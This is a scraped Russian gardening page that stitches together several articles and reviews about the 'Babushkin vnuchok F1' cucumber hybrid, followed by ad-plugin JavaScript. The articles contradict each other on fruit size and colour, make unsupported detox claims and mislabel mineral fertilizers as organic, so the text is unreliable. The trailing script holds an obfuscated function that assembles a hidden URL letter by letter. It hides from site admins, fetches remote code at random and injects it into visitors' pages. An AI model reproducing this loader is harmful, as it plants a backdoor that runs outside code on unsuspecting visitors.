0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика огурцов сорта бабушкин внучок

Характеристика огурцов сорта Бабушкин Внучок

При выращивании огурцов на своем участке или теплице садоводам важно выбрать сорт, плоды которого смогут полностью оправдать потраченные на него время и силы. Достаточно хорошо зарекомендовал себя сорт огурцов Бабушкин внучок.

Характеристика огурцов сорта Бабушкин Внучок

Характеристика сорта

Сорт огурца Внучок является гибридом раннеспелой группы растений. Выращивать его можно как на открытых участках, так и в тепличных условиях. Это обусловлено тем, что огурец Внучок с пометкой ф1 является гибридом партенокарпическим, то есть не требует опыления пчелами для плодоношения.

Биологи классифицируют эту сортовую разновидность как представителя растений с женским типом цветения. Плоды созревают в течение 38-40 после того, как появятся первые всходы. Огурцы этого сорта считаются пригодными для товарной реализации.

Показатели урожайности гибрида f1 достаточно высоки. Один гектар кустов приносит от 374 до 469 ц урожая. При этом выход товарной продукции составляет 80-96%, что является очень высоким показателем.

В своем применении сортовая разновидность универсальна. Собранные плоды пригодны:

  1. Для потребления в свежем виде.
  2. Для засолки.
  3. Для маринования и консервации.

Описание куста

Огурцы Бабушкин внучок f1 представляют собой растения среднерослые. Ветвистость куста также находится на среднем уровне. Описание культуры также гласит о том, что наш сорт индетерминантный. Это значит, что плеть растет, не ограничиваясь цветочной кистью.

Лиственный покров кустов по своему размеру средний. Цвет листьев зеленый. Согласно материалам биологов, на кустах этой сортовой разновидности формируется завязь букетного типа.

Описание плода

Как уже говорилось ранее, плоды этой разновидности огуречной культуры подходят для товарной реализации. Это обусловлено их внешними и вкусовыми характеристиками.

Форма зеленцов этого сорта овально-цилиндрическая, бугорки на поверхности мелкие. Плоды в своем размере не превышают 7-9 см, а масса каждого плода достигает около 65-80 граммов. Длина зеленца и его диаметр находятся в соотношении 3:1.

Кожица плода зеленая у основания, у верхушки более светлая. На поверхности плода плотное опушение с белыми шипами. Также есть продольные полосы белого цвета, которые четко выражены на трети плода, после становятся более размытыми. Также на кожице присутствует четко выраженная пятнистость.

Мякоть зеленоватая по окрасу, хрустящая. Во вкусе нет горечи. Камера, в которой находятся семена, небольшая.

Именно такая совокупность качеств и характеристик сделала этот гибридный сорт столь популярным среди фермеров и садоводов. Не менее важную роль сыграла хорошая лежкость плодов, что положительно влияет на товарные качества.

Выращивание

Растение требует хорошего ухода

Для того, чтобы культура принесла максимальный урожай, его важно правильно высадить и ухаживать за ним. Только так можно из обычного семенного материала получить качественные плоды.

Семена обычно высаживают на рассаду в апреле или начале мая. На открытые участки ростки пересаживают в конце мая или начале июня. Высаживать рассаду необходимо на фазе 2-3 листьев настоящих. Посадочный материал помещается под временные укрытия из пленочного материала. Высаживают рассаду по схеме 50х50, то есть расстояние между кустами должно быть не менее 50 см.

Уход за растением во время произрастания на участке включает в себя стандартные меры, а именно:

  1. Окучивание.
  2. Прополка.
  3. Полив под растение в вечернее время суток.

Опытные садоводы говорят о том, что при излишне жаркой погоде поливать растения стоит дважды в день – утром и вечером. Также рекомендуется срезать плоды во время сбора. Это позволяет избежать лишних повреждений растения.

Устойчивость к болезням

Эта сортовая разновидность огуречной культуры является достаточно болезнеустойчивой. Многие садоводы с опытом утверждают, что этому огурцу не страшны основные болезни, поражающие культуру. Это еще один фактор, влияющий на популярность сорта.

Устойчивость сорта распространяется на следующие болезнетворные процессы:

  1. Мучнистая роса.
  2. Корневые гнили.
  3. Бурая пятнистость.
  4. Вирус огуречной мозаики.

Также культура толерантна по отношению к пероноспорозу. Такие природные свойства разновидности делают уход за ней несколько проще, что также хорошо и для фермеров.

Заключение

Раннеспелые огурцы Бабушкин внучок пользуются большой популярностью у садоводов в виду хороших товарных и вкусовых характеристик плодов, хорошей лежкости, простоты в уходе и высокой устойчивости к болезням. Не менее важна и высокая урожайность этой разновидности, выведенной отечественными селекционерами.

Огурец-гибрид «Бабушкин внучок f1»: описание и особенности агротехники

Многие садоводы-любители отдают предпочтение огурцу Бабушкин внучок f1. Свою популярность гибрид завоевал стабильным высоким урожаем, отменным вкусом плодов и устойчивостью к основным заболеваниям. Культура неприхотлива в уходе, быстро адаптируется к перепадам температур. Одинаково хорошо растет в открытом и закрытом грунте.

Описание

Огурец-гибрид Бабушкин внучок был выведен путем скрещивания двух сортов с ранними сроками созревания. Официально овощ внесен в Госреестр в 2012 году.

Культура относится к партенокарпическому (самоопыляемому) типу. Каждый цветок состоит из тычинок и пестика. Культивируют огурец в открытом грунте и тепличных условиях.

Сроки созревания ранние: с момента появления всходов до сбора урожая проходит 38–42 дней.

У самих плодов привлекательный товарный вид, они легко переносят транспортировку, сохраняя полезные свойства и неизменный состав. Подходят для выращивания на продажу.

Отличительные черты

У гибрида Бабушкин внучок f1 букетный тип цветения (в одном узле формируется более 3 завязей).

Другие характерные особенности культуры:

  • высокая урожайность, превышающая в 2-3 раза аналогичные сорта;
  • образование в каждом узле от 5 до 12 завязей;
  • устойчивость к перепадам температур;
  • ограниченный рост боковых побегов;
  • устойчивость к мучнистой росе, кладоспориозу и корневым гнилям;
  • расположение плодов в узле от 2 до 4.

Огурец занимает немного места на участке: на 1 м2 размещают по 3–5 растений.

Состав и польза

Гибрид содержит много полезных веществ:

  • витамины — С, А, РР, В1, В2, бета-каротин;
  • микроэлементы — цинк, железо, калий, марганец, магний, йод, медь, фолиевая кислота, хром, натрий, хлор, фосфор.

Огурец легко усваивается организмом, так как на 90 % состоит из структурированной воды. Он улучшает состояние щитовидной железы, предотвращает мочекаменную болезнь, варикозное расширение вен, нарушения сердечно-сосудистой системы, снижает содержание вредного холестерина в крови. Выводит из организма шлаки, токсины и соли тяжелых металлов.

В основном плоды состоят из клетчатки, которая легко и быстро усваивается. Калорийность у огурца низкая -15 ккал на 100 г, его добавляют в ежедневный рацион при диете и здоровом питании.

Характеристики кустов и плодов

Гибрид среднерослый. Ветви разрастаются негусто. Листья насыщенного зеленого цвета и среднего размера. Цветки женского типа.

Характеристика плодов:

  • форма овально-цилиндрическая, слегка укороченная;
  • длина — 9–11 см;
  • масса — 75–115 г;
  • диаметр — до 2,5 см;
  • окрас неравномерный: темно-зеленый у основания и более светлый ближе к верхушке;
  • плоды с продольными желтыми полосами и заметной пятнистостью;
  • кожица покрыта бугорками и светлыми шипами;
  • мякоть светло-зеленого цвета с плотной структурой;
  • при надкусывании плоды издают характерный хруст;
  • вкус приятный без горечи;
  • аромат освежающий;
  • семенные камеры небольшие.

Урожайность гибрида высокая: 11-12 кг с 1 м2.

Как вырастить самостоятельно

Гибрид предназначен для самостоятельного выращивания на приусадебном участке. Время посева: с конца апреля и до начала мая.

От соблюдения правил подготовки семян, высадки культуры в грунт и ухода за молодыми растениями зависит качество урожая.

Посадка семенным и рассадным способами

Перед посадкой семена осматривают: отделяют самые мелкие и имеющие повреждения. Они не пригодны к использованию.

После материал обрабатывают:

  • помещают в 3%-ный раствор марганцовки на 20–30 минут для обеззараживания;
  • затем кладут в стимулятор роста, согласно прилагаемой инструкции.

Высаживают семена в небольшие емкости (торфяные горшочки или продольные ящики) или сразу в грунт.

Для рассадного способа почву приобретают в специализированном магазине или готовят самостоятельно, смешивая компост, торф, перегной и песок. Зерна заглубляют на 2–2,5 см.

При посадке в емкости соблюдают такие нюансы:

  • тару накрывают полиэтиленовым пакетом;
  • поддерживают стабильную температуру — +25…+30 °С;
  • освещают более 12–14 часов, для чего дополнительно устанавливают фитолампы;
  • ежедневно открывают емкости и опрыскивают землю из пульверизатора.

Требования к посадке в открытый грунт:

  • дождаться стабильной температуры почвы около +13…+15 °С (не должно быть ночных заморозков);
  • проделать ряды с расстоянием в 50 см;
  • поместить по 2 семечка в лунку, высаживать их через каждые 30 см.

При возможном снижении ночной температуры сооружают пленочное укрытие над местом посадки.

Внимание! Пересаживают сеянцы из емкостей в открытый грунт через 2 недели, когда появятся 2-3 листка.

Выращивание и уход

Через 5-6 дней должны появиться первые всходы. Если рассада находится в теплице, то на несколько часов в день помещение открывают для доступа кислорода и поддержания влажности воздуха на нормальном уровне.

При выращивании придерживаются ряда рекомендаций:

  • поливают кусты только теплой отстоянной водой утром или вечером — в жаркие дни орошают всходы 2 раза в день;
  • желательно при каждом увлажнении удалять сорняки и рыхлить землю;
  • грунт периодически окучивают, разрыхленную землю присыпают горкой к стеблям растений, это обеспечит их устойчивость и лучшее развитие корневой системы;
  • по мере подрастания гибрида стебель подвязывают к деревянным столбикам хлопковой лентой или шпагатом, не допуская перетягивания стебля.

Подкормки вносят несколько раз на разных стадиях роста:

  • через 10–14 дней после пересадки;
  • во время цветения;
  • в период плодоношения.

Используют органические удобрения: аммиачную селитру, препараты с калием и суперфосфат. Средство разводят в воде, поливают им прямо под корень. Следят, чтобы раствор не попадал на листья или стебель культуры.

Особенности выращивания и возможные трудности

Огурец выращивают в любой почве, где есть дренаж и хорошая аэрация. Однако земля должна быть легкая и богатая гумусом.

Чтобы гибрид рос лучше, его не сажают каждый сезон подряд на одно и то же место. Выжидают срок в 4 года. Хорошие предшественники — томат, картофель, горох и кукуруза, а нежелательные — клубника, тыква, кабачок, арбуз и дыня.

Трудности выращивания культуры:

  • если во время полива вода плохо просачивается, граблями осторожно делают несколько углублений, чтобы не повредить корни растений;
  • чтобы не допустить чрезмерного разрастания кустов, главный стебель прищипывают после образования 6-7 листков;
  • если плоды собрать не вовремя, они перезреют, а кожура погрубеет.

Важно! Урожай собирают регулярно: несколько раз в неделю. Это стимулирует кусты к формированию большего количества плодов.

Болезни и вредители

Гибрид устойчив к мучнистой росе, бурой пятнистости, корневой гнили, огуречной мозаике и пероноспорозу. Культура практически не атакуется и насекомыми-вредителями.

Причины возможного заражения:

  • обилие сорняков;
  • чрезмерное орошение почвы;
  • повышенная влажность;
  • неправильный севооборот.

Для профилактики заболеваний при каждом поливе кусты внимательно осматривают. Если появились темные пятна, изгрызенные листья или признаки подсыхания, растения обрабатывают специальными средствами («Фитоспорином», бордоской жидкостью, «Квадрисом» или «Тирамом»).

Сбор и применение урожая

Овощи собирают на протяжении всего сезона. Их используют для употребления в свежем виде, добавляют в салаты и различные блюда, консервируют, маринуют и засаливают.

Гибрид выращивают в промышленных масштабах на фермерских хозяйствах. Собранный урожай продают в розницу и консервируют на предприятиях.

Преимущества и недостатки

Бабушкин внучок отличается широким перечнем достоинств, в числе которых:

  • самоопыление;
  • выращивание на открытом воздухе и в теплице;
  • устойчивость к перепадам температур;
  • сбор плодов в течение всего сезона;
  • высокая урожайность;
  • устойчивость к характерным для культуры заболеваниям;
  • нетребовательность к уходу;
  • отменный вкус овощей и полезный состав;
  • универсальность в применении;
  • сохранность плодов, их реализация на продажу.

Недостатков у растения практически нет. Отмечают только чувствительность к пересыханию почвы и огрубение кожуры овощей при перезревании.

Важно! Для сохранения товарного вида огурцы не срывают, а аккуратно срезают острым садовым инструментом.

Отзывы

Овощеводы отмечают высокую урожайность гибрида, неприхотливость в уходе и отличный вкус плодов.

Анастасия, г. Воронеж: «Посадила Бабушкин внучок впервые. Сначала в горшочки, потом на грядку. Плодоносить стал быстро, только и успевала собирать хрустящие огурчики. Очень довольна».

Владимир, г. Курск: «Сажаю не первый год. Мне нравится, что с каждого куста собираю по несколько килограммов. За сезон полностью обеспечен огурцами. У них приятный вкус и совсем нет горечи. Никогда не сталкивался с заболеваниями».

Мария, г. Кисловодск: «Каждый год провожу лето на даче. Выращиваю третий год подряд этот гибрид. Ему не нужен особый уход — только вовремя подвязываю, поливаю и пропалываю. Оставшийся урожай закрываю на зиму. Весь год обеспечена вкусными огурцами».

Заключение

Огурец-гибрид Бабушкин внучок f1 не требует особенного ухода. Одинаково хорошо растет в открытом грунте и тепличных условиях. Урожай дает стабильный и высокий (11-12 кг с 1 м2) на протяжении целого сезона. Устойчив к основным заболеваниям и вредителям. Огурцы хрустящие, с нежным вкусом и свежим ароматом.

Раннеспелый гибрид огурцов «Бабушкин внучок F1»: фото, видео, описание, посадка, характеристика, урожайность, отзывы

Благодаря скороспелости, невосприимчивости к заболеваниям и отличным вкусовым характеристикам гибрид «Бабушкин внучок» занимает лидирующие позиции на потребительском рынке среди владельцев фермерских хозяйств и приусадебных участков. Гибрид пользуется популярностью из-за высокой урожайности и устойчивости к неблагоприятным климатическим условиям.

Происхождение сорта огурцов «Бабушкин внучок ф1»

Гибрид «Бабушкин внучок» в 2012 году был официально внесен в государственный реестр селекционных достижений. Оригинаторами являются: ООО «Научно-исследовательский институт селекции овощных культур» (г. Москва) и ООО»Селекционная фирма Гавриш» (г. Москва).

Краткий обзор:

Описание сорта

«Бабушкин внучок» — гибрид раннего срока созревания. Первые огурчики дегустируют спустя 38-40 дней после появления полных всходов.

Плоды:

  • Овально-цилиндрической формы;
  • С зеленой окраской у основания и более светлой верхушкой. С продольными белыми полосками, покрывающих 1/3 плода, а также четко выраженной пятнистостью;
  • С мелкобугорчатой кожурой, с частым опушением и шипами белого цвета;
  • С хрустящей, плотной мякотью, с мелкими семенами, без горечи;
  • Длина — 7-9 см;
  • Средняя масса — от 65 до 80 грамм.

Кусты:

  • Индетерминантного типа, среднерослые, со средней ветвистостью;
  • С женским типом цветения;
  • Листья средних размеров, зеленой окраски;
  • С букетным типом завязей, до 2-4 завязей в одном узле.

Достоинства и недостатки

Из достоинств гибрида «Бабушкин внучок» выделяют:

  • Ранний срок созревания;
  • Высокую урожайность;
  • Способность к самоопылению;
  • Пригодность для товарной реализации;
  • Отличные вкусовые характеристики;
  • Товарный внешний вид;
  • Неприхотливость в выращивании и в уходе;
  • Дружную отдачу урожая;
  • Устойчивость к большинству огуречных заболеваний;
  • Способность к длительному хранению;
  • Возможность транспортировки на дальние расстояния;
  • Длительный период плодоношения;
  • Хорошую переносимость неблагоприятных погодных условий.

Применение

По назначению зеленцы гибрида «Бабаушкин внучок» универсальные. Собранный урожай используют для потребления в свежем виде, засаливают, маринуют и консервируют.

Агротехника или правильное выращивание

Основные рекомендации по выращиванию:

  • Семенной материал высевают на рассаду в апреле либо в первых числах мая;
  • Непосредственный посев семян на открытые грядки осуществляют в последней декаде мая либо в первой декаде июня;
  • Пересаживают огуречную рассаду после формирования 2-3 полноценных листочков;
  • В первое время посадки следует обеспечить временным пленочным укрытием на случай непредвиденных ночных заморозков;
  • Рекомендуемая схема высадки рассады — 50х50 см. На 1 м 2 размещают не более 3-4 огуречных кустиков.

Гибрид «Бабушкин внучок» нуждается в следующем уходе:

  • Посадки регулярно, умеренно поливают, избегая чрезмерного увлажнения грунта. Оросительные процедуры осуществляют в вечернее время, используя нагретую на солнце воду. В засушливый период поливают дважды в день — утром и вечером;
  • Своевременно избавляются от сорных растений. Сорная растительность забирает большую часть питательных веществ из почвы, а также окисляет её, что в дальнейшем оказывает негативное влияние на культуру;
  • Почву после орошения необходимо рыхлить. Процедуру проводят с осторожностью, избегая возможного травмирования нежной корневой системы;
  • За сезон растение подкармливают 3-4 раза, используя минеральные комплексные удобрения;
  • При выращивании в тепличных условиях сооружение регулярно проветривают, чтобы избежать возникновение заболеваний;
  • Растение выращивают на вертикальной опоре. Это позволит улучшить освещенность и проветриваемость кустов, а также облегчит дальнейший уход и сбор урожая.

Болезни и вредители

Гибрид «Бабушкин внучок» обладает прекрасным иммунитетом к характерным огуречным заболеваниям, а именно:

  • Мучнистой росе;
  • Корневым гнилям;
  • Бурой пятнистости;
  • Вирусу огуречной мозаики.

Чтобы предотвратить возникновение заболеваний необходимо регулярно контролировать состояние стеблей, листочков и плодов. При появлении на растениях черных либо серых пятен, засохших либо погрызанных насекомыми листочков, кусты обрабатывают дезинфицирующими препаратами. В противном случае произойдет заражение здоровых растений и их дальнейшая гибель. Выбор препарата для проведения обработки обусловлен источником инфекции:

В качестве профилактики применяют:

Обязательно все работы проводят при наличии защитной одежды и респиратора, поскольку входящие в состав препаратов химикаты представляют опасность для человеческого здоровья.

Урожайность

Показатель товарной урожайности гибрида «Бабушкин внучок» довольно высок. С одного гектара посадок можно собрать от 374 до 469 центнеров.

В каких регионах лучше выращивать?

«Бабушкин внучок» допущен к использованию на всей территории России.

Отзывы о сорте от тех, кто сажал

Скороспелый гибрид популярен у огородников благодаря высоким товарным и вкусовым характеристикам, хорошей лежкости, неприхотливости и наличию хорошего иммунитета. Также гибрид отличается высокими показателями урожайности.

Отзыв огородника:

При соблюдении всех агротехнических рекомендаций получить обильный качественный урожай способен даже начинающий огородник. Вырастив гибрид «Бабушкин внучок» один раз многие огородники предпочитают его культивировать ежегодно.

Достойный представитель раннеспелых корнишонов — огурец Бабушкин внучок F1: описание и характеристика сорта

Бабушкин внучок F1 достоин того, чтобы выращивать этот огурец у себя на участке. Он не требует опылителей, стоек к заболеваниям. Корнишоны обладают отменным вкусом и хороши в свежем и консервированном виде.

Место посадки Сроки созревания Способ применения Длина плода Группа Гладкость плода Способ опыления
Универсальный Раннеспелый (35-45 дней) Универсальный Короткие (корнишоны) — менее 10 см Гибрид Слабобугристые Партенокарпический

Описание и характеристика сорта

Гибрид выращивают в различных условиях – на открытых участках, в отапливаемых и временных теплицах (в северных широтах). Культивар порадует ранними корнишонами на балконах и подоконниках.

Гибрид всегда показывает стабильную урожайность. Он используется для домашнего потребления и массовой реализации на рынке.

  • в 1 узле завязывается по 5-10 цветочков, зеленцев вызревает по 3-5;
  • плодоношение букетное;
  • ветвистость средняя;
  • индетерминантный тип роста;
  • не требует опыления пчелами, завязь образует в любых условиях;
  • основной побег рослый и крепкий;
  • высота куста около 1,5-1,8 м;
  • боковые ветви ограничены в росте.
  • длина 6-8 см;
  • масса 100-120 г;
  • диаметр до 2,5 см;
  • окраска темно-зеленая;
  • бугорки небольшие, расположены негусто;
  • мякоть тугая, сочная, хрусткая;
  • кожица тонкая, но стойкая к повреждениям.

Преимущества и недостатки

  • скороспелость;
  • высокая продуктивность;
  • стойкость к огуречным вредителям и патогенам;
  • товарность и замечательные вкусовые характеристики;
  • неприхотливость и непривередливость.

Минусы:

  • необходимость регулярного сбора урожая.

Урожайность

С 1 м2 собирают 10-12,8 кг. Товарные качества высокие, оцениваются в 92-95%. Мякоть хрустящая, кожица нежная. Плоды не подвержены механическим повреждениям и хорошо транспортируются, подходят для дальнейшей продажи, заготовок к зиме.

Посадка

Семена на рассаду высевают с последней недели апреля. Для улучшения прорастания можно замачивать в гидрогумате или Цирконе. Для почвенной смеси смешивают такие компоненты:

Зерна заделывают на глубину 1-1,5 см. До всходов в течение 5-6 дней ростки держат под пленкой, желательная температура 25-30 градусов. Для посадки используют контейнеры с высотой стенки 8 см, торфяные горшочки.

При безрассадной посадке семена высевают в грунт, когда земля стабильно прогреется до 12-14 градусов. Выдерживают дистанцию между лунками в 30 см. В каждую ямку сеют по 2 семечка – более слабый проросток впоследствии прищипывают.

Плотность посадки на 1 м2:

  • в теплицах и парниках 2-3 куста;
  • на неукрывных участках 3-5 растений.

Выращивание и уход

Агротехника включает традиционные приемы:

  1. Формировка. Из пазух первых 5 листочков убирают стебли и цветки, далее в пазухах оставляют цветки, но снимают побеги.
  2. Полив. Через 2-3 дня с использованием теплой воды, чтобы не допустить грибкового заражения.
  3. Подкормки. Используют органику и минералы – препараты калия, суперфосфат, аммиачную селитру.
  4. Внекорневое орошение. Используют средства Мегафол, Терафлекс.
  5. Фиксация. Подвязывают к столбам или шпалерным конструкциям. Не допускают перетягивания стебля.

Огурец «Бабушкин внучек» F1. Итоги тестирования

Подвожу итоги тестирования и делюсь впечатлениями о огурце «Бабушкин внучек F от селекционно-семеноводческой фирмы Гавриш.



Когда выбирала огурцы для тестирования, в первую очередь обращала внимание на их устойчивость к болезням, так как у меня ложная мучнистая роса частый гость.
Так вот «Бабушкин внучек» как раз и устойчив к мучнистой росе, кладоспориозу и корневым гнилям.

Из описания сорта:

  • Скороспелый (38-43 дня от всходов до плодоношения)
  • урожайный
  • партенокарпический гибрид для выращивания
  • в открытом грунте и под плёночными укрытиями.
  • Растение мощное, с ограниченным ростом боковых побегов.
  • Корнишоны массой 110-120г ., тёмно-зелёные среднебугорчатые, с белым опушением.

Гибрид урожайный, плодоносил с июня до середины сентября, хрустящий, ароматный! Урожайность превзошла даже заявленную, гибрид универсального назначения.

Ход тестирования:

Тест на всхожесть и посев

Проверяя всхожесть я замачивала семена 19.04, всхожесть 100%, 20.04 все семена проросли и были высажены в контейнеры.

Развитие рассады

Всходы появились 23.04, а 24.04 я выставила ящики в теплицу для перцев, так как огурцы стали вытягиваться.
Для защиты от яркого солнышка и ночных понижений температур поставила дуги и накрыла спанбондом.

Первый настоящий лист появился 1мая, сфотографировала 3 мая. Полив тёплой водой в поддон, чтоб земля в контейнерах не уплотнялась.

Высадка в парник

Земля в парнике прогрелась и на момент высадки рассада огурцов уже имеет 3-4 настоящих листа.

Высадила в парник 13 мая, просыпая каждую лунку золой и добавив ложку удобрения Гуми.

Цветение и появление первых завязей

Высаженная в плёночный парник рассада прижилась хорошо и 3.06 раскрылись первые цветы.

Первые завязи я увидела 9 июня,

подсчитала, что с момента всходов до момента появления завязей (6-8 см.) прошло 48 дней, это на 5 дней позже заявленного.

Сбор плодов, характеристика плода.

Собрала первый урожай 16 июня.

Характеристика плодов:

Зеленцы длиной 10 — 11 см, вес меньше заявленного — 105 г.

Бугорки средние, шипы белые, сладкий, хрустящий огурец. Если огурец перерос, то бугорки почти незаметны, а семена так и остаются маленькими.

Частично прищипнула боковые плети и выбрала 4 растения, с которых буду снимать урожай отдельно и взвешивать в течении всего периода плодоношения. Чтобы точно знать, урожай с какого огурца изображён на фотографии, я около весов размещала бумажку с названием сорта и номером растения.

Огурчики приходилось снимать часто, чем раньше я снимала зеленцы, не дожидаясь веса в 120 г., тем быстрее нарастали новые. Для консервации собирала маленькие огурчики, а на салаты шли огурцы побольше.
Результаты записывала в таблицу, количество снятых огурчиков и их вес.



Характеристика урожая:

Огурец «Бабушкин внучок» с 16.06 по 2.09 было собрано:
№1 – 119 шт., вес 7619 г
№2 – 120 шт., вес 7407 г,
№3 – 126 шт., вес 8682 г,
№4 – 115 шт., вес 7130 г
Среднее количество – 120 шт, средний вес – 7709 г с одного растения!

В начале сентября ночи стали холодными и огурчики расти начали медленнее, форма огурца немного изменилась, но на вкусовые качества это никак не повлияло.

последний сбор, что я взвешивала, был 569 г. с четырёх кустов за 2 сентября, плети начали сплетаться наверху друг с другом

и с 6.09 определять с какого куста снят огурец стало проблемно, а ещё через несколько дней и общее взвешивание стало невозможным, так как огурцы окончательно переплелись между собой под крышей парника.
С приходом холодных ночей появились признаки заболевания ложной мучнистой росой.
С 15 сентября начала освобождать парник от растений.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
